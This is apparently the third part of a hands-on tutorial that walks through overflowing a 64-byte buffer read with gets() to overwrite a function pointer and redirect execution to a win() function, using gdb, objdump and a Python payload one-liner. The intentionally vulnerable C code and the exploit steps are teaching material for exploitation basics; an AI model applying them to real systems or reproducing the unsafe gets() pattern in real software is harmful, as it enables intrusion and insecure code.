#BR3AKing 3V3N M04R 0f th3 th1ngs!11?!

Welcome back to destroying applications with python - hopefully you have already completed parts one and two are ready to learn some more about break applications and getting deeper in to the stack.

Before going any further - Let's take a quick run down over the vulnerable applications we have run. Let's re-exploit them so they are fresh in our heads and let's use `objdump -d` and `gdb` to analyse the registers when we break our code. Let's make sure we are all comfortable!

Let's sharpen the scripts we wrote in the previous examples and test them out, let's make sure they are working for us (we can recompile the C code with different buffer sizes and scenarios to overflow)

The reason we do this as we are going to try this a little bit differently. Although, you have the source code. I don't want you to read it, instead, Let's try and do this blind!

In the real world we do not get the source code, so let's do this properly - so please compile, but don't read too heavily (read it - make sure I am not putting anything nasty on your computer!):

In [0]:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("PWNED! - code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 volatile int (*fp)();
 char buffer[64];

 fp = 0;

 gets(buffer);

 if(fp) {
  printf("function pointer jumping to: 0x%08x\n", fp);
  fp();
 }
}

##What is happening:

Well let's find **out** but without reading.

When we compile the source and run it we get:
```
./example5



````
OK... that's bugging out maybe an argument? (`ctrl + c`)
```
./example5

```
Hmm... let's flood it!
```
python -c 'print("A"*1000)' | ./example5
calling function pointer, jumping to 0x41414141
Segmentation fault
```
oh Hai dere!

There's our segfault that confirms that the overflow happened and we can see the `calling function pointer` followed by a memory address of "A"'s

We have two goals here:
- Find out at which point the Overflow happens
- Work out the memory address of the correct function

The first should be easy for you now from the previous examples and our scripts. We use a bit of python to iterate through an find how long it takes to break the application. 


The second we will take a look at now:


### Finding the memory address of the function

If we do `info functions` from `gdb` it will list all the functions and their memory addresses, we can also do this with `objdump -d`. 

But what is the function we’re looking for?
```

(gdb) info functions
```

We see a lot of functions but the most interesting one is called “win” , the address on computer will be different from the address to your machine. use 
```
objdump -d example5
```
to find it.

(I got address 0x08048424)

### Applying the exploit

Now we can easily build our exploit , we know that the buffer is length in chars and after that we can pass the address of the function and the function pointer will execute it in my case:
```
python -c "print 'A' * XX + '\x24\x84\x04\x08'" | ./example5
```

And we get the output `code flow changed successfully`

## Breakdown of the code and what happens
Let's look again at the code:

In [0]:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 volatile int (*fp)();
 char buffer[64];

 fp = 0;

 gets(buffer);

 if(fp) {
  printf("calling function pointer, jumping to 0x%08x\n", fp);
  fp();
 }
}

We see function win() is defined at the top then after that the function main() which defines the function pointer , sets a buffer of 64 chars to it , then sets its value to 0. After that it takes our argument and stores it in the buffer. 

The last thing is an if statement that checks if the function pointer value is changed from 0 then it calls the address of that new value which is how we lock on to the new function.

### Tasks 
Now we know how to crack this lock from the debugged lets get it done pragmatically!
- Update your gdb scripts to to this task for us
- work out the memory address of the function we want from the list of them
- work out the offset that we need to overflow the buffer and control EIP
- combine and make it happen! 😹